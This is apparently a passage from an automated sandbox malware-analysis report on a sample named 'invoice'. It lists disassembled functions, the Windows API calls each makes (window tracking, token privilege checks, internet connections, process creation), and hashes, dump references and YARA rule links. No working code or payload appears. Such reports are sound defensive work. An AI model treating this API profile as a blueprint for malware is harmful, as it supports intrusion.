                          • Part of subcall function 00FE3685: GetCurrentThreadId.KERNEL32 ref: 00FE36A6
                          • Part of subcall function 00FE3685: AttachThreadInput.USER32(00000000,?,00FE50AC), ref: 00FE36AD
                        • GetCaretPos.USER32(?), ref: 01004F7C
                        • ClientToScreen.USER32(00000000,?), ref: 01004FB7
                        • GetForegroundWindow.USER32 ref: 01004FBD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: 41fd78ba15c335e71a42353ea8dfe40e530cf964b7562f1be19d1fa8ce989d0a
                        • Instruction ID: a6c2d73029c48078373171d4a65ed02ccb19bba453c3242c9ad25f51d38a12d6
                        • Opcode Fuzzy Hash: 41fd78ba15c335e71a42353ea8dfe40e530cf964b7562f1be19d1fa8ce989d0a
                        • Instruction Fuzzy Hash: 00312B72900108AFDB14EFB5CC859EFB7F9EF88304F14406AE546E7241EA799E01DBA1
                        Function 0100C502 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • GetCursorPos.USER32(?), ref: 0100C53C
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FBBB2B,?,?,?,?,?), ref: 0100C551
                        • GetCursorPos.USER32(?), ref: 0100C59E
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FBBB2B,?,?,?), ref: 0100C5D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                        • String ID:
                        • API String ID: 2864067406-0
                        • Opcode ID: 41ba5745f8e2a61339ffea00fadb8a694a151738fbbea19740f25b8a33b5c8fe
                        • Instruction ID: 3ce3877cc9f1a5fea8ffebe6a8c06f88983aba4050837da46260e837f4129aae
                        • Opcode Fuzzy Hash: 41ba5745f8e2a61339ffea00fadb8a694a151738fbbea19740f25b8a33b5c8fe
                        • Instruction Fuzzy Hash: 4231E539100118EFFB22CF58C998EEA7BF5EB49311F0441D9FA858B2D1D7369990DBA0
                        Function 00FD897E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FD8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FD8449
                          • Part of subcall function 00FD8432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8453
                          • Part of subcall function 00FD8432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8462
                          • Part of subcall function 00FD8432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8469
                          • Part of subcall function 00FD8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD847F
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FD89CB
                        • _memcmp.LIBCMT ref: 00FD89EE
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FD8A24
                        • HeapFree.KERNEL32(00000000), ref: 00FD8A2B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                        • String ID:
                        • API String ID: 1592001646-0
                        • Opcode ID: 5b4fc2f3846d95b6a550a1a276760ebb0c41a2de57f60db4663df108e73b27ac
                        • Instruction ID: 6e3d54849222e754d9386993c9d8029f5f92b3dbeda2db390c2316eba0fade15
                        • Opcode Fuzzy Hash: 5b4fc2f3846d95b6a550a1a276760ebb0c41a2de57f60db4663df108e73b27ac
                        • Instruction Fuzzy Hash: 3B21AE72E40109BFDB10DFA4C945BEEBBB9EF40391F09405AE494A7340DB35AA06EF51
                        Function 00FA0B0C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                        Download Yara Rule
                        APIs
                        • __setmode.LIBCMT ref: 00FA0B2E
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE793F,?,?,00000000), ref: 00F85B8C
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE793F,?,?,00000000,?,?), ref: 00F85BB0
                        • _fprintf.LIBCMT ref: 00FA0B65
                        • OutputDebugStringW.KERNEL32(?), ref: 00FD6111
                          • Part of subcall function 00FA4C1A: _flsall.LIBCMT ref: 00FA4C33
                        • __setmode.LIBCMT ref: 00FA0B9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                        • String ID:
                        • API String ID: 521402451-0
                        • Opcode ID: 6c482d66c315328cf39361344e4862da74be188ba4fd1b4122829c3fadf9f4ba
                        • Instruction ID: 6e5016daed530ad4f649094f491a4f3fb9c956d21d21b32265ed8f0033c04015
                        • Opcode Fuzzy Hash: 6c482d66c315328cf39361344e4862da74be188ba4fd1b4122829c3fadf9f4ba
                        • Instruction Fuzzy Hash: D4113AB29042047FDB04B7B4AC47DFE7B6D9F83320F14001AF11897282DEAD684277A5
                        Function 00FF187D Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FF18B9
                          • Part of subcall function 00FF1943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FF1962
                          • Part of subcall function 00FF1943: InternetCloseHandle.WININET(00000000), ref: 00FF19FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Internet$CloseConnectHandleOpen
                        • String ID:
                        • API String ID: 1463438336-0
                        • Opcode ID: a00152de32c1a9df24ca91cc6ccb0a1a84630562dd6365b6055ea748182c745c
                        • Instruction ID: 8f1a269c0d4257038378d2c61bc3f47f3b8e973f5574fae8f248527849feedf4
                        • Opcode Fuzzy Hash: a00152de32c1a9df24ca91cc6ccb0a1a84630562dd6365b6055ea748182c745c
                        • Instruction Fuzzy Hash: BE21A176600609FFEB229F608C10F7AB7ADFF88710F14401AFB5596660DBB5D811B7A1
                        Function 00FE3A6E Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNEL32(?,0100FAC0), ref: 00FE3AA8
                        • GetLastError.KERNEL32 ref: 00FE3AB7
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FE3AC6
                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0100FAC0), ref: 00FE3B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast
                        • String ID:
                        • API String ID: 2267087916-0
                        • Opcode ID: e9a9caf0e5df969df8617f0c32ddbbc0b6bde47ceb8baf220bc00a581ec3e6f9
                        • Instruction ID: ca7322375f0ae8f4d8bf43242bbec19ce939789f7069d91eb56f6f786d89ad80
                        • Opcode Fuzzy Hash: e9a9caf0e5df969df8617f0c32ddbbc0b6bde47ceb8baf220bc00a581ec3e6f9
                        • Instruction Fuzzy Hash: 7421E7749083419F8310EF25C88899BB7E4EF85B24F144A1DF49AC7291E735DE45EB82
                        Function 00FB5262 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00FB5281
                          • Part of subcall function 00FA588C: __FF_MSGBANNER.LIBCMT ref: 00FA58A3
                          • Part of subcall function 00FA588C: __NMSG_WRITE.LIBCMT ref: 00FA58AA
                          • Part of subcall function 00FA588C: RtlAllocateHeap.NTDLL(014F0000,00000000,00000001,00000000,?,?,?,00FA0F53,?), ref: 00FA58CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        • Opcode ID: be762b508e5a18c247dc76c3ac28a48e93b8aa4464e1adf2ddc7bbab5a4ef769
                        • Instruction ID: 13f230159d9cce80a9b66f459b759a1bdf0f1d947987342bf453cb2b1ed71066
                        • Opcode Fuzzy Hash: be762b508e5a18c247dc76c3ac28a48e93b8aa4464e1adf2ddc7bbab5a4ef769
                        • Instruction Fuzzy Hash: 5E110A72E02A169FCB312FB5AC0579E3798AF06BB0F204529F9449A181DE7D8D41BF60
                        Function 00F84531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00F84560
                          • Part of subcall function 00F8410D: _memset.LIBCMT ref: 00F8418D
                          • Part of subcall function 00F8410D: _wcscpy.LIBCMT ref: 00F841E1
                          • Part of subcall function 00F8410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F841F1
                        • KillTimer.USER32(?,00000001,?,?), ref: 00F845B5
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F845C4
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FBD5FE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                        • String ID:
                        • API String ID: 1378193009-0
                        • Opcode ID: 379f30f58ff74eaf5a9b089f52d1355afc1c0d1142503515fee5c0215c098eb4
                        • Instruction ID: b2f9418b5095f05593ff63cb59da107dd130978439f4e1f1cf7a8612dc236790
                        • Opcode Fuzzy Hash: 379f30f58ff74eaf5a9b089f52d1355afc1c0d1142503515fee5c0215c098eb4
                        • Instruction Fuzzy Hash: 9F210EB19047849FEB339B34C855BEBBBECAF01318F08009EE6CD5A145D7756984EB52
                        Function 00FF647F Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE793F,?,?,00000000), ref: 00F85B8C
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE793F,?,?,00000000,?,?), ref: 00F85BB0
                        • gethostbyname.WSOCK32(?), ref: 00FF64AF
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF64BA
                        • _memmove.LIBCMT ref: 00FF64E7
                        • inet_ntoa.WSOCK32(?), ref: 00FF64F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                        • String ID:
                        • API String ID: 1504782959-0
                        • Opcode ID: 06eaff34df81e5e589e2572fd24eed564469fe814809033d714f699b2ffb9ff1
                        • Instruction ID: 3d3206489801ad60ab18ee59897dbed4f43af6e949f1dd9ec5e5673037f07a3a
                        • Opcode Fuzzy Hash: 06eaff34df81e5e589e2572fd24eed564469fe814809033d714f699b2ffb9ff1
                        • Instruction Fuzzy Hash: 96116D36900109AFCB15FBA4DD86DEEB7B8BF44710B184065F602A7261DF39AF05EB61
                        Function 00FD8E03 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00FD8E23
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD8E35
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD8E4B
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD8E66
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 92d74f3c659697a9c1300edee1f803a2f31530801cbf4412b3ad90898918b841
                        • Instruction ID: ab34938d5976a258e7ee8f21b78b062493dc3352e1ee7c78b179e892dc750cf5
                        • Opcode Fuzzy Hash: 92d74f3c659697a9c1300edee1f803a2f31530801cbf4412b3ad90898918b841
                        • Instruction Fuzzy Hash: EA114C79900218FFDB11DFA5CC85E9DBB79FB48750F204096E900B7250DA716E11EB90
                        Function 00F81290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • DefDlgProcW.USER32(?,00000020,?), ref: 00F812D8
                        • GetClientRect.USER32(?,?), ref: 00FBB77B
                        • GetCursorPos.USER32(?), ref: 00FBB785
                        • ScreenToClient.USER32(?,?), ref: 00FBB790
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Client$CursorLongProcRectScreenWindow
                        • String ID:
                        • API String ID: 4127811313-0
                        • Opcode ID: 86a0b5a4586839b26e48f33f586fe6824246253886c0e52047dce9b5b7be2395
                        • Instruction ID: 2b7bb1f7d60c16a56b3fb5affa20413507b51b1aca96e40f2752eac82105f615
                        • Opcode Fuzzy Hash: 86a0b5a4586839b26e48f33f586fe6824246253886c0e52047dce9b5b7be2395
                        • Instruction Fuzzy Hash: 72118C36A0011AEFCB20EFA4D8859FE77BCFB05311F000556F941E3240C735BA52ABA5
                        Function 00FE1473 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FE001E,?,00FE1071,?,00008000), ref: 00FE1490
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FE001E,?,00FE1071,?,00008000), ref: 00FE14B5
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FE001E,?,00FE1071,?,00008000), ref: 00FE14BF
                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00FE001E,?,00FE1071,?,00008000), ref: 00FE14F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: fc2808cfe28f9b26b508683e29f15d1de9b34d8e726013a7a969a1d51827f74d
                        • Instruction ID: 937aa834bf57ea30fe2861735aceca95b9606e801f9d1e2c68cf67e1794b959b
                        • Opcode Fuzzy Hash: fc2808cfe28f9b26b508683e29f15d1de9b34d8e726013a7a969a1d51827f74d
                        • Instruction Fuzzy Hash: B3112A32C0056ADBCF10EFA7D949AEEBB78FF0A711F014155E980B6384CB359590EBA1
                        Function 00FDDB40 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FDDB5C
                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FDDB73
                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FDDB88
                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FDDBA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Type$Register$FileLoadModuleNameUser
                        • String ID:
                        • API String ID: 1352324309-0
                        • Opcode ID: 27341d895ec514e59efb3b3211f1ce065807bfe92d656bf073776a6f6f3712e2
                        • Instruction ID: 33c2de0323db522a20b442373aa3bccecff08d12e702bb3e1e0b672d4775f687
                        • Opcode Fuzzy Hash: 27341d895ec514e59efb3b3211f1ce065807bfe92d656bf073776a6f6f3712e2
                        • Instruction Fuzzy Hash: B511ADB1201305EBE3308F10DC48F96BBBDEB40B04F15855BAA96C7280DBB5E914ABA1
                        Function 00FB7137 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction ID: f3b71a3a7c30070453ada3509e91663b2499872346aefc6f7cde9d4372eb8c20
                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction Fuzzy Hash: E6014B3645824EBBCF126E8ACC058EE3F26BF58354B598415FE5868131D336C9B1BFA1
                        Function 0100B2F9 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 0100B318
                        • ScreenToClient.USER32(?,?), ref: 0100B330
                        • ScreenToClient.USER32(?,?), ref: 0100B354
                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0100B36F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClientRectScreen$InvalidateWindow
                        • String ID:
                        • API String ID: 357397906-0
                        • Opcode ID: d3391d64f0d82ec806f3f31c171d08a3c79579ed12561f84f31342885b060c83
                        • Instruction ID: 8a6887f9804e96136d8e505b5e637fd7d3db9d4fef5f8abc7549288d4a11666f
                        • Opcode Fuzzy Hash: d3391d64f0d82ec806f3f31c171d08a3c79579ed12561f84f31342885b060c83
                        • Instruction Fuzzy Hash: A91144B9D0420AEFDB51DFA8C8849EEBBF9FF08210F108156E954E3214D735AA55DF90
                        Function 0100B669 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0100B678
                        • _memset.LIBCMT ref: 0100B687
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01046F20,01046F64), ref: 0100B6B6
                        • CloseHandle.KERNEL32 ref: 0100B6C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memset$CloseCreateHandleProcess
